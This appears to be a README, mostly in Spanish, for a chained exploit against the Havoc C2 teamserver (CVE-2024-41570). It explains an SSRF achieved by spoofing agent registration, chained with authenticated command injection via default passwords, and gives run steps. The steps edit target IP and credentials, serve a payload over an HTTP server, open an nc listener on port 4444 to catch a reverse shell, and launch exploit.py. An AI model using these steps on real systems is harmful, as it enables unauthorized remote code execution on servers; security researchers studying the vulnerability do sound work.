
Esto es un RCE encadenado en el framework Havoc C2 utilizando los PoCs de github.com/chebuya y github.com/IncludeSecurity
Este es un RCE encadenado (CVE-2024-41570) en el framework Havoc C2.
Inyección de comandos: Havoc es vulnerable a la inyección de comandos, lo que permite a un usuario autenticado ejecutar comandos en el Teamserver. Afecta a las versiones 0.3 hasta la última versión 0.6. El perfil predeterminado de Havoc contiene contraseñas codificadas, por lo que un operador de C2 que descuidadamente use el perfil predeterminado en una red pública puede ser explotado inmediatamente.
SSRF: Esta vulnerabilidad se explota suplantando el registro y los checkins de un agente demonio para abrir un socket TCP en el teamserver y leer/escribir datos desde él. Esto permite a los atacantes filtrar las IPs de origen de los teamservers y mucho más.
Cadena: Abusar del SSRF para entregar un payload autenticado de inyección de comandos.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
Créditos para @chebuya y @Hyperreality